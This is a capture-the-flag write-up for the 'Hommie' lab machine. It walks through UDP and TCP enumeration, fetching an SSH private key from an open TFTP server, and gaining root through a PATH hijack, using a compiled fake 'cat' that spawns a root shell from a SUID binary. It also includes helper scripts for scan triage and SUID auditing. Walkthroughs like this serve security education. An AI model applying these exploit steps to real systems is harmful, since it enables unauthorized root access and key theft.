Hommie

Overview

Honestly, I learnt a lot in this box about nmap UDP scans and the importance of having a proper enumeration technique.

Box Difficulty: Easy
Link: hackmyvm

Explanation behind nmap UDP scans

UDP scanning is simply slow and unreliable. A full UDP port scan can take days, and if you crank up parallelism or otherwise force it to go faster it becomes unreliable; even a normal scan is unreliable. Here is the example from the Nmap book, Chapter 5, Port Scanning Techniques and Algorithms, for UDP:

**Example 5.5. UDP scan example**

krad# **`nmap -sU -T4 scanme.nmap.org`**

Starting Nmap ( http://nmap.org )
All 1000 scanned ports on scanme.nmap.org (64.13.134.52) are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 5.50 seconds

In this case, the scan didn’t narrow down the open ports at all. All 1000 are open|filtered. A new strategy is called for.

The book then shows how to optimize UDP scan time:

**Example 5.9. Optimizing UDP Scan Time**

krad# **`nmap -sUV -T4 -F --version-intensity 0 scanme.nmap.org`**

Starting Nmap ( http://nmap.org )
Nmap scan report for scanme.nmap.org (64.13.134.52)
Not shown: 99 open|filtered ports
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND 9.3.4

Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds

Explanation:

–> --version-intensity 0 for version detection scans

Version detection (-sV) is often needed to differentiate open from filtered UDP ports. Version detection is relatively slow since it involves sending a large number of application protocol-specific probes to every open or open|filtered port found on the target machines. Specifying --version-intensity 0 directs Nmap to try only the probes most likely to be effective against a given port number.

–> Scan popular ports first using -F

Very few UDP port numbers are commonly used. A scan of the most common 100 UDP ports (using the -F option) will finish quickly. You can then investigate those results while you launch a multi-day 65K-port sweep of the network in the background.

–> -sUV

When version scanning is enabled with -sV (or -A), it will send UDP probes to every open|filtered port (as well as known open ones). If any of the probes elicit a response from an open|filtered port, the state is changed to open.

Improve Recon

Moving forward, these will be my go-to recon steps before nmap.

Step 1. Find all possible active ports using masscan.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# masscan -p1-65535,U:1-65535 192.168.56.24 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-12-26 12:00:29 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 192.168.56.24
Discovered open port 21/tcp on 192.168.56.24
Discovered open port 80/tcp on 192.168.56.24

Step 2. Further enumerate the UDP ports with nmap to weed out the open|filtered false positives.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# nmap -sUV -T4 -F --version-intensity 0 192.168.56.24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 03:42 EST
Warning: 192.168.56.24 giving up on port because retransmission cap hit (6).
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 63.00% done; ETC: 03:43 (0:00:18 remaining)
Nmap scan report for 192.168.56.24
Host is up (0.00047s latency).
Not shown: 83 closed udp ports (port-unreach)
PORT      STATE         SERVICE     VERSION
17/udp    open|filtered tcpwrapped
19/udp    open|filtered tcpwrapped
68/udp    open|filtered tcpwrapped
69/udp    open|filtered tftp
135/udp   open|filtered tcpwrapped
138/udp   open|filtered tcpwrapped
443/udp   open|filtered https
445/udp   open|filtered tcpwrapped
500/udp   open|filtered isakmp
631/udp   open|filtered tcpwrapped
1028/udp  open|filtered tcpwrapped
3456/udp  open|filtered tcpwrapped
5353/udp  open|filtered zeroconf
31337/udp open|filtered BackOrifice
32815/udp open|filtered tcpwrapped
49193/udp open|filtered tcpwrapped
49194/udp open|filtered tcpwrapped
MAC Address: 08:00:27:19:C6:FA (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.64 seconds

With this we now have interesting targets: ports 21, 22 and 80 on TCP, and UDP port 69, which runs TFTP!
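To make the two-step triage repeatable, here is an added example (my own code, not from the original post) that parses masscan and nmap -sUV output and separates the UDP ports worth following up from the open|filtered noise, using the same rule applied by hand above. The two sample outputs are constructed, modelled on the transcripts, and the target address is the box's 192.168.56.24.

```python
import re
from dataclasses import dataclass

# Constructed samples modelled on the masscan and nmap transcripts above, not the real output.
MASSCAN_SAMPLE = """\
Discovered open port 22/tcp on 192.168.56.24
Discovered open port 21/tcp on 192.168.56.24
Discovered open port 80/tcp on 192.168.56.24
"""
NMAP_SAMPLE = """\
Not shown: 83 closed udp ports (port-unreach)
PORT      STATE         SERVICE     VERSION
17/udp    open|filtered tcpwrapped
53/udp    open          domain      ISC BIND 9.11
69/udp    open|filtered tftp
5353/udp  open|filtered zeroconf
"""
MASSCAN_RE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on \S+")
NMAP_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

@dataclass(frozen=True)
class Port:
    number: int
    proto: str
    state: str
    service: str

def parse_masscan(text):
    """(port, proto) pairs masscan reported as open, sorted by port number."""
    return sorted({(int(m[1]), m[2]) for m in MASSCAN_RE.finditer(text)})

def parse_nmap(text):
    """Per-port lines from nmap's normal output (PORT STATE SERVICE [VERSION])."""
    hits = (NMAP_PORT_RE.match(line.strip()) for line in text.splitlines())
    return [Port(int(m[1]), m[2], m[3], m[4]) for m in hits if m]

def triage_udp(ports):
    """Split UDP results into follow-up candidates and parked noise.
    open: an application reply came back, so something is listening.
    open|filtered + named service: a version probe matched a signature even
    though no reply settled the state; worth a manual look (like tftp here).
    open|filtered tcpwrapped: nothing usable answered; park it for the slow
    full sweep rather than chasing every such port by hand."""
    follow, parked = [], []
    for p in ports:
        if p.proto != "udp":
            continue
        if p.state == "open" or (p.state == "open|filtered" and p.service != "tcpwrapped"):
            follow.append(p)
        elif p.state == "open|filtered":
            parked.append(p)
    return follow, parked

def tcp_followup_command(masscan_ports, target):
    """The targeted nmap -sV -sC scan for the TCP ports masscan found."""
    tcp = ",".join(str(n) for n, proto in masscan_ports if proto == "tcp")
    return f"nmap -sV -sC -p {tcp} {target} -oN nmap.txt"

if __name__ == "__main__":
    print(tcp_followup_command(parse_masscan(MASSCAN_SAMPLE), "192.168.56.24"))
    follow, parked = triage_udp(parse_nmap(NMAP_SAMPLE))
    print("follow up:", [f"{p.number}/udp {p.service}" for p in follow])
    print("parked:", [f"{p.number}/udp" for p in parked])
```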

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─#  nmap -sV -sC -p 21,22,80 192.168.56.24 -o nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 22:11 EST
Nmap scan report for 192.168.56.24
Host is up (0.00033s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0               0 Sep 30  2020 index.html
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)
|   256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)
|_  256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:19:C6:FA (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds

HTTP - TCP 80

Feroxbuster shows an index.html file.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# feroxbuster --url http://192.168.56.24:80 -x txt,html,php,php.bak,bak,jsp -t 100 -d 1 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o feroxbuster_p80.txt && sort -k5 -o feroxbuster_p80.txt feroxbuster_p80.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.4.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.24:80
 🚀  Threads               │ 100
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.4.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💾  Output File           │ feroxbuster_p80.txt
 💲  Extensions            │ [txt, html, php, php.bak, bak, jsp]
 🔃  Recursion Depth       │ 1
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200        4l       14w       99c http://192.168.56.24/index.html
[####################] - 9m   8916726/8916726 0s      found:1       errors:0      
[####################] - 9m   8916726/8916726 16132/s http://192.168.56.24

It looks like we are looking for alexia's id_rsa key to SSH into the server.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# curl http://192.168.56.24/index.html
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobodya

FTP - TCP 21

Let's download all the files on the FTP server to the local machine to see if there's an id_rsa.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# wget -m --no-passive ftp://anonymous:anonymous@192.168.56.24
--2021-12-25 23:09:43--  ftp://anonymous:*password*@192.168.56.24/
           => ‘192.168.56.24/.listing’
Connecting to 192.168.56.24:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> PORT ... done.    ==> LIST ... done.
…

Look through all the files; the .web directory holds the same index.html that is served at http://192.168.56.24/index.html.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# ls -la 
total 28
drwxr-xr-x  3 root root 4096 Dec 25 23:09 .
drwxr-xr-x 11 root root 4096 Dec 25 22:10 ..
drwxr-xr-x  3 root root 4096 Dec 25 23:09 192.168.56.24

┌──(root💀kali)-[/opt/hackmyv/hommie/192.168.56.24]
└─# ls -laR
.:
total 16
drwxr-xr-x 3 root root 4096 Dec 25 23:09 .
drwxr-xr-x 3 root root 4096 Dec 25 23:09 ..
-rw-r--r-- 1 root root    0 Sep 30  2020 index.html
-rw-r--r-- 1 root root  249 Dec 25 23:09 .listing
drwxr-xr-x 2 root root 4096 Dec 25 23:09 .web

./.web:
total 16
drwxr-xr-x 2 root root 4096 Dec 25 23:09 .
drwxr-xr-x 3 root root 4096 Dec 25 23:09 ..
-rw-r--r-- 1 root root   99 Sep 30  2020 index.html
-rw-r--r-- 1 root root  187 Dec 25 23:09 .listing

No luck.

TFTP - UDP 69

The Trivial File Transfer Protocol (TFTP) uses UDP port 69 and requires no authentication; clients can read files from, and write files to, the server.

Let's see if there is an id_rsa stored on the TFTP server.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# tftp 192.168.56.24
tftp> get id_rsa
Received 1850 bytes in 0.0 seconds
tftp> quit

Shell as alexia

Great, let's double-check it before we SSH in as alexia.

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# tftp 192.168.56.24
tftp> get id_rsa
Received 1850 bytes in 0.0 seconds
tftp> quit

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
…
-----END OPENSSH PRIVATE KEY-----

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# chmod 600 id_rsa

┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# ssh alexia@192.168.56.24 -i id_rsa
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 30 11:06:15 2020
alexia@hommie:~$ whoami;id;hostname
alexia
uid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
hommie

Shell as Root

Download LinPEAS to help with privilege escalation.

alexia@hommie:~$ cd /tmp
alexia@hommie:/tmp$ wget http://192.168.56.3:1235/linpeas.sh
--2021-12-26 07:08:09--  http://192.168.56.3:1235/linpeas.sh
Connecting to 192.168.56.3:1235... connected.
HTTP request sent, awaiting response... 200 OK
Length: 330173 (322K) [text/x-sh]
Saving to: ‘linpeas.sh’

Running the script shows a very interesting file: -rwsr-sr-x 1 root root 17K Sep 30 2020 /opt/showMetheKey. Looks fishy.

════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root        10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root        63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root        44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root        83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        44K Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root        53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root        35K Jan 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root        63K Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root        51K Jan 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root       427K Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus  50K Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root        17K Sep 30  2020 /opt/showMetheKey
----------------------------------------------------------------------------------------
  --- Trying to execute /opt/showMetheKey with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
wait4(12781, -----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
----------------------------------------------------------------------------------------

Running the file outputs alexia's SSH private key (id_rsa). Looking at the binary with the strings command confirms that it really does read the current user's SSH key: cat $HOME/.ssh/id_rsa

alexia@hommie:/tmp$ strings /opt/showMetheKey
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat $HOME/.ssh/id_rsa

This is a PATH environment variable exploit.

If a program invokes a command without an absolute path, and one of the PATH directories is writable by our user (or, as here, we can set PATH ourselves before running the program), we can create a program or script with the same name as the executed command. Because cat is called without an absolute path, we can abuse this!

We can create our own program named cat that gives us a root shell!
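As a defender-side counterpart, here is an added example (my own code, not from the post or the box) that automates the check done by hand above: it walks a tree for setuid/setgid files, pulls printable strings the way strings(1) does, and flags embedded command lines whose program name is not an absolute path. SAMPLE_STRINGS is a constructed list modelled on the strings output above, not a dump of the real binary.

```python
import os
import re
import stat

# Constructed sample of the printable strings a small setuid wrapper like the
# one above might contain (not a dump of the real /opt/showMetheKey).
SAMPLE_STRINGS = ["libc.so.6", "setuid", "system", "__libc_start_main",
                  "GLIBC_2.2.5", "cat $HOME/.ssh/id_rsa", "/usr/bin/id -u"]

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")          # same rule as strings(1): 4+ printable bytes
COMMAND_LINE = re.compile(r"^([a-z][a-z0-9._-]*)\s+\S")  # bare command name followed by arguments
PATH_USERS = {"system", "popen", "execvp", "execlp"}     # libc calls that resolve names via /bin/sh or PATH

def extract_strings(data: bytes) -> list:
    """Printable runs of 4+ bytes, like strings(1), so no external tool is needed."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(data)]

def relative_commands(strings) -> list:
    """Embedded command lines whose program name carries no '/'.

    This is the red flag from the post: run through system(), such a command
    executes whatever binary of that name the caller's PATH finds first.
    Symbol names and version tags contain no whitespace, so they never match;
    treat the result as triage output to confirm by hand, not as proof."""
    return [s for s in strings if COMMAND_LINE.match(s)]

def find_suid(root: str) -> list:
    """Regular files under root with the setuid or setgid bit (the LinPEAS check)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(path)
    return sorted(found)

def audit(path: str) -> dict:
    """One binary's report: PATH-consulting libc calls it imports, and bare commands it embeds."""
    with open(path, "rb") as f:
        strings = extract_strings(f.read())
    return {"path": path,
            "path_users": sorted(PATH_USERS & set(strings)),
            "relative_commands": relative_commands(strings)}

if __name__ == "__main__":
    for suid in find_suid("/usr/bin"):
        report = audit(suid)
        if report["path_users"] and report["relative_commands"]:
            print(report)
```

Run as root against /opt and /usr/local to cover locally installed binaries like this one; the fix for any hit is an absolute path plus a fixed environment in the binary itself.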

alexia@hommie:/tmp$ cat cat.c 
int main() {
setuid(0);
system("/bin/bash -p");
}

alexia@hommie:/tmp$ gcc -o cat cat.c
cat.c: In function ‘main’:
cat.c:2:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
 setuid(0);
 ^~~~~~
cat.c:3:1: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
 system("/bin/bash -p");
 ^~~~~~
alexia@hommie:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Prepend the current directory (or wherever the fake cat binary is located) to the PATH variable and execute the SUID file for a root shell:

alexia@hommie:/tmp$ PATH=.:$PATH /opt/showMetheKey
root@hommie:/tmp# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(alexia)
root@hommie:/root# cat note.txt 
I dont remember where I stored root.txt !!!
root@hommie:/# find . -name root.txt
./usr/include/root.txt

And we are root!

This post is licensed under CC BY 4.0 by the author.